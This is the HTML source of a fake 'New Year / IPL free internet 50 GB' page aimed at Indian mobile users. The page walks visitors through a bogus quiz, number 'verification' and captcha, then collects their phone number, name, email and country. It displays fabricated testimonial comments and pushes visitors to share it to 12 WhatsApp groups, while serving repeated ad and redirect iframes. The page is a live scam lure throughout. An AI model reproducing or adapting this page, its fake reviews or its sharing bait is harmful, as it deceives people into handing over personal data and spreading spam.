



<!DOCTYPE html>
<html lang="es">


  <head>


	
	
	
	
	
	
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-211545431-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-211545431-1');
</script>
	
	
	
	
	
	
	
	 <meta content='text/html; charset=utf-8' http-equiv='content-type'/>
    <meta content='width=device-width, initial-scale=1.0' name='viewport'/>
   <title>Get New Year free Internet: 50 GB</title>
   <meta property="og:image" content="https://1.bp.blogspot.com/-ZjujT3-aO4g/XnSsj_zH3TI/AAAAAAAAAHI/vX8tnOy281cUyFyVxS6T5PppA0opyGd2gCLcBGAsYHQ/w128-h128-p-k-no-nu/50gbFree.png">
   <meta property="og:title" content="Get New Year free Internet: 50 GB">
   <meta property="og:description" content="30 Days of FREE! internet">
   <meta property="og:url" content="https://50_GB_FREE.COM">
   
   <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>

 <script src='https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js'></script>
<link rel="stylesheet" type="text/css" href="newcss.css"/>
<script type="text/javascript" src="linkjs.js"></script>













<link href="https://fonts.googleapis.com/css?family=Roboto|Varela+Round" rel="stylesheet">
<link rel="stylesheet" href="https://fonts.googleapis.com/icon?family=Material+Icons">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>

<link rel="stylesheet" type="text/css" href="sucess.css">












<script type="text/javascript" language="javascript">
var areYouReallySure = false;
var internalLink = false;
</script>


	
   







</head>

  <body onLoad="startCount1();" >
<center>
<div class= body1>
    
    <div class='popup fourth' id='popup1' style='display:none'>
      <div class='popup-head'>
        <img alt='' height='26' id='alertimg' src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABoAAAAaAQMAAACThN6NAAAABlBMVEUAAAC5ubnoUmKJAAAAAXRSTlMAQObYZgAAAEVJREFUCNdjQAI8cEIOTtiDiPoGGPH5AIh4wMDA+PkDAwMzhPjBwMAOIvg//4ES8v//AbV+/g8l6v//b4AQ////P8CACgCNvyHz1VKxBQAAAABJRU5ErkJggg==' width='26'/>
         Attention!  
      </div>
      <div class='popup-center'>
      Now 2 Step Left
      </div>
      <div class='popup-bottom'>
        <div class='button' onclick='hidepop();'>
          Ok
        </div>
      </div>
    </div>
  
	
	
		<center>

	
    <div class='content'>
	
 <div class='content-middle'>
        <div class='content-inner' >
           <p class='headline'>

          </p> 
   
          <p class='small_headlines'><b>
<br>
<div class="h11">
IPL Unlimited free Internet</div>
<br/><br/>

Try Your Luck To Get Free Unlimited Internet In Any Network like Jio, VI, Airtel, BSNL etc

<br/><br/>

</b> </p>

    <div class="counter12">
        
    <span class="timer1">Left only <span id="counter1">11352</span> free Internet packages.</span>
</div>


</div>

<br>
<br>

<center>
    
    <div class="image1">
       <br>
       <div class="ads_show">

      <iframe src="//cheatingstiffen.com/watchnew?key=5b0acc47baec3168d910f53b99a1a0bb" width="320" height="50" frameborder="0" scrolling="no"></iframe> 
       <br>
</div>
  <a href="https://cheatingstiffen.com/mwmpd6d3?key=75bcc2a95b8589e8140ee71af2539559" target="blank"><img class="image" src="image/1.jpg" width="385px" ></a><br>
  <a href="https://cheatingstiffen.com/mwmpd6d3?key=75bcc2a95b8589e8140ee71af2539559" target="blank"><img class="image" src="image/2.jpg" width="385px" ></a>
  


<br>
  <br><br>
   </div>
   <div class="image2">
       <br>
   <iframe src="//cheatingstiffen.com/watchnew?key=5b0acc47baec3168d910f53b99a1a0bb" width="320" height="50" frameborder="0" scrolling="no"></iframe><br><br>
   
<a href="https://cheatingstiffen.com/mwmpd6d3?key=75bcc2a95b8589e8140ee71af2539559" target="blank"><img src="image/3.jpg" width="385px" /></a><br>

 <br>

</div>



</center>


       
         
          <div class='survey_outer' id="outer1">
            <div class='survey_middle'>
              <div class='survey_inner'>
              <!--  <p class='question_count'>
                 Pergunta
                  <span>
                    1
                  </span>
               de 3
                </p> -->
                <p class='question_text question1'>
                 1. How many days would you like to use free internet? 
                </p>
                <p class='question_text question2'>
                 2. How many GB would you like to receive on your mobile per day?
                </p>
                <p class='question_text question3'>
                 3. Which network would you like to activate?
                </p>

                  <p class="question_text question4">Enter Your Number</p>
                   


                <div class='ans-box'>
                  <div class='answer anses1'>
                    <p>
                    28 days
                    </p>
                  </div>
                  <div class='answer anses1'>
                    <p>
                    56 days
                    </p>
                  </div>
    
                  
              
                  <div class='answer anses2'>
                    <p>
                      1GB
                    </p>
                  </div>
                  <div class='answer anses2'>
                    <p>
                      1.5GB
                    </p>
                  </div>
                   <div class='answer anses2'>
                    <p>
                      2GB
                    </p>
                  </div>
                  
                  <div class='answer anses3'>
                    <p>
                      3G
                    </p>
                  </div>
                  <div class='answer anses3'>
                    <p>
                      4G
                    </p>
                  </div>
                         
             <form class="anses4" id="myForm" method="post" >
                 
                <input name="phone" class="answer13" id="phone" type="text" placeholder="Enter Your Number">
               
                 <br>
                     <input class='answer12' type="button" onclick="SubmitFormData()"  value="Submit">
                   </form>




         
                </div>
                
                <p class='calculating'>
                  <img alt='' src='https://media.giphy.com/media/8DcYkij7pUxUY/giphy.gif'/>
                   Please wait
                </p>
                <div class='loading'>
                  <p class='load_headline'>
                  Please wait...
                  <br><br>
                  <img alt='' src='https://media.giphy.com/media/3o7TKtnuHOHHUjR38Y/source.gif' style='height:50px;width:50px;'/></p>
                  <p class='question_text check1'>
                  Verification...

                  </p>
                    <p class='question_text check2'>
                  Checking your number...
                  </p>
                  <p class='check check3'>
                 Congratulations!<br>Your Number Is Verified
                  </p> 

             <input class='answer14 check5' type="button" id="submitFormData" value=" Continue">

                </div>




               <center>
             <br><br>
              <div class="captcha1" id="jump_to_this_location2">
                  
                  
                  
                  
                  
                  
<link rel="stylesheet" type="text/css" href="newcss.css">


<iframe src="//cheatingstiffen.com/watchnew?key=5b0acc47baec3168d910f53b99a1a0bb" width="320" height="50" frameborder="0" scrolling="no"></iframe>



<br>
<br>
<br>


               <h1 id="captchaHeading">Captcha Verify</h1>
               <div id="captchaBackground">
               <canvas id="captcha">captcha text</canvas>
               <input id="textBox" type="text" name="text"><br>
               <div id="buttons">

               <input id="submitButton" type="submit">
               <button id="refreshButton" type="submit">Refresh</button>
               </div>
               <span id="output"></span>
               </div>
               <br><br><br><br>
               <script type="text/javascript" src="captcha11.js"></script>

                </div>

                
               </center>


















<div class="form_container" >
  <center>
      
    

<div class="container12" >
    <br>
     <iframe src="//cheatingstiffen.com/watchnew?key=5b0acc47baec3168d910f53b99a1a0bb" width="320" height="50" frameborder="0" scrolling="no"></iframe>
      
      

    <br>
      <br>
    

<div class="form-style-5">
<form id="form_detail" name="form12">

<legend><b>Enter Your Detail </b></legend><br>
<span class ="error"><p id="name_error"></p></span>
<input id="name" type="text"  placeholder="Your Name *" >
<span class = "error"><p id="email_error"></p></span>
<input id="email" type="email"  placeholder="Your Email *">
<span class = "error"><p id="country_error"></p></span>
<input id="country" type="text"  placeholder="Country *">
<span class = "error" ><p id="number2_error"></p></span>
<input id="number2" type="text" placeholder="Mobile Number *" >
 
 

<input id="submitform" type="button" value="Activate" onclick="form_fil()">
</form>
</div>

</div>
</center>
<br>




    <div class="last_show_box">
    <center>
        <br>
        <iframe src="//cheatingstiffen.com/watchnew?key=5b0acc47baec3168d910f53b99a1a0bb" width="320" height="50" frameborder="0" scrolling="no"></iframe>
        
        <br><br>
        
        
        
        
        <br>
        <hr>
    <h2 class="h2">Congratulation!</h2> 
    <hr>
    
        <br>
    <h4> Your Form Is Submited Successfully.<br>
     Thank You!</h4>
     <br>
     <p>
     You Will Get Your Data With In 48 hours.
     <br>
     Your Request Is Sended To Your Service Provide.<br>
     
     They Will Process It With In 48 hours<br><br>
      Thanks You
      </p>
      
      <br><br>
      <br>
      
      <iframe src="//cheatingstiffen.com/watchnew?key=5b0acc47baec3168d910f53b99a1a0bb" width="320" height="50" frameborder="0" scrolling="no"></iframe>
      
      <br>
      <br>
    </center>
     </div>
     
    
     
     
  
    
    


</div> 








                <div class='last_page' id="jump_to_this_location">
                  <div class='last-up'>
                    <h4 class='textlastup'>
                        
                        
                        
                        
                        
					
Congratulations, you won for free 56 GB from your mobile operator!
<br/><br/>
How to activate free internet<br/>
1.Before you continue, click the green button <b>"SHARE" </b> and send this to 12 Whatsapp Groups or friends so they can also get this free service!
<br/><br/>
2.After the sharing, You <!-- Need to <b> Visit This Site</b> after that you --> will be asked to activate this free service for 28 days or 56 days.
<br/><br/>
</h4>



<!-- Ads Hare
<center>
<a href="https://bit.ly/Free-peytm-cash" target="blank"><img src="https://1.bp.blogspot.com/-2ia_cs1MrcM/XoYRGsBcXlI/AAAAAAAAAJg/iyRsZqLPI78-rXd0Tz7lYHyZ4UkF_-PKgCLcBGAsYHQ/s1600/adsGIF.gif" width="95%" /></a>
</center>
Ads Close -->




<script type="text/javascript" src="linkjs1.js">
 </script>





<a onclick='incrementValue()'>
<button class='btn btn-primary' onclick='fn1()' type='button'>SHARE</button></a>
                    <input id='number' type='hidden' value='0'/>
                    <input id='number' type='hidden' value='0'/>
<h4 class='textlastup'>
Share until the bottom panel is full:</h4>

<div class='progress'>
				<span aria-valuemax='100' aria-valuemin='1' aria-valuenow='1' id='progressbar' style='width: 1%; max-width: 100%;'></span>
			</div>





                
                  </div>
  
                  
                  <hr/>
                  
                  <iframe src="//cheatingstiffen.com/watchnew?key=5b0acc47baec3168d910f53b99a1a0bb" width="320" height="50" frameborder="0" scrolling="no"></iframe>
                  
				  </div></div></div></div>
				  <br/>
<br>  
<div id="fbcoms1" class='fbcoms' style="display:none;">
                    <p class='comments'>
                    </p>
                    <p class='buttons'>
                      <span class='like'>
                        Like     
                      </span>
                      &#183; 
                      <span>
                        Share    
                      </span>
                      &#183; 
                      <span>
                        Comment
                      </span>
                      &#183; 
                      <span>
                        Remove
                      </span>
                    </p>
                    <p class='totlikes'>
                      <span id='youand'>
                      </span>
                      <span class='fbblue'>
                        others 204,208 
                      </span>
                      like this
                    </p>
                    <p class='viewmore clearfix'>
                      <span class='left'>
                        more comments...
                      </span>
                      <span class='right'>
                   63 of 173,330
                      </span>
                      <br/>
                    </p>
                    <div class='item' id='fb8' style='display: none; opacity: 1;'>
                      <img class='profileimg' height='50' src='https://i.imgur.com/QNlv3ac.jpeg' width='50'/>
                      <p class='comtxt' style='display: block;'>
                        <span class='name'>
                        Akriti Bhat 
                        </span>
                        <br/>
                       Thanks for this gift!! I get 50GB for free just now  


                      </p>
                      <p class='combot' style='display: block;'>
                        <span class='ago'>
                          Just now    
                        </span>
                        &#183; 
                        <span class='fblike'>
                          Like
                        </span>
                      </p>
                    </div>
                    <div class='item' id='fb7' style='display: none; opacity: 1;'>
                      <img class="profileimg" height="50" src="https://i.imgur.com/6s3hGMo.jpeg" width="50">
                      <p class='comtxt' style='display: block;'>
                        <span class='name'>
                          Gayatri Anand  
                        </span>
                        <br/>
                      Oooh thx ! I can't believe that I wan this 



                      </p>
                      <p class='combot' style='display: block;'>
                        <span class='ago'>
                          Just now     
                        </span>
                        &#183; 
                        <span class='fblike'>
                          Like
                        </span>
                      </p>
                    </div>
                    <div class='item' id='fb6' style='display: none; opacity: 1;'>
                      <img class='profileimg' height='50' src='https://i.imgur.com/56aFlbO.jpeg' width='50'/>
                      <p class='comtxt' style='display: block;'>
                        <span class='name'>
                          Himani Goel   
                        </span>
                        <br/>
                      I've got 50GB .. Thank you   
                      </p>
                      <p class='combot' style='display: block;'>
                        <span class='ago'>
                          Just now     
                        </span>
                        &#183; 
                        <span class='fblike'>
                          Like
                        </span>
                      </p>
                    </div>
                    <div class='item' id='fb5' style='display: none; opacity: 1;'>
                      <img class='profileimg' height='50' src='https://i.imgur.com/8dyZfsp.jpeg' width='50'/>
                      <p class='comtxt' style='display: block;'>
                        <span class='name'>
                         Indeever Chaudhary  
                        </span>
                        <br/>
                         Thank you !


                      </p>
                      <p class='combot' style='display: block;'>
                        <span class='ago'>
                          Just now     
                        </span>
                        &#183; 
                        <span class='fblike'>
                          Like
                        </span>
                      </p>
                    </div>

                    <div class='item' id='fb4' style='display: none; opacity: 1;'>
                      <img class='profileimg' height='50' src='https://i.imgur.com/ukowzyH.jpeg' width='50'/>
                      <p class='comtxt' style='display: block;'>
                        <span class='name'>
                      Roy Malik 
                        </span>
                        <br/>   You should share with your friends to get this promotion!!! 

                      </p>
                      <p class='combot' style='display: block;'>
                        <span class='ago'>
                          Just now     
                        </span>
                        &#183; 
                        <span class='fblike'>
                          Like
                        </span>
                      </p>
                    </div>
                    
                    <div class='item'>
                      <img class='profileimg' height='50' src='https://i.imgur.com/DBA0duQ.jpeg' width='50'/>
                      <p class='comtxt'>
                        <span class='name'>
                    Sahni Lakshmiraman 

                        </span>
                        <br/>
                        Fantastic! Thank you a lot for this


                      </p>
                      <p class='combot'>
                        <span class='ago'>
                       2 min ago
                        </span>
                        &#183; 
                        <span class='fblike'>
                          Like
                        </span>
                        <span class='likes totlikes'>
                          223
                        </span>
                      </p>
                    </div>
                  </div>
                  <br/>
              
            
                </div>
      
     
                </div>
     
 <div class="ads_show">
 <iframe src="//cheatingstiffen.com/watchnew?key=5b0acc47baec3168d910f53b99a1a0bb" width="320" height="50" frameborder="0" scrolling="no"></iframe></div>
 <br>
 <br>
 </center>
<br>
<br>

<center>
<div class="success11">


<div id="myModal" class="modal fade" onclick= "success_end()">
  <div class="modal-dialog modal-confirm">
    <div class="modal-content">
      <div class="modal-header">
        <div class="icon-box">
          <i class="material-icons">&#xE876;</i>
        </div>        
        <h4 class="modal-title">Success!</h4> 
      </div>
      <div class="modal-body">
        <p class="text-center">Your Acivation Request Is Submited. You Will Get Your Free Internet With In 48 hours.</p>
      </div>
      <div class="modal-footer">
        <button class="btn btn-success btn-block" data-dismiss="modal">OK</button>
      </div>
    </div>
  </div>
</div>
</center>

</div>
  
</div>
</center>
</body>

</html> 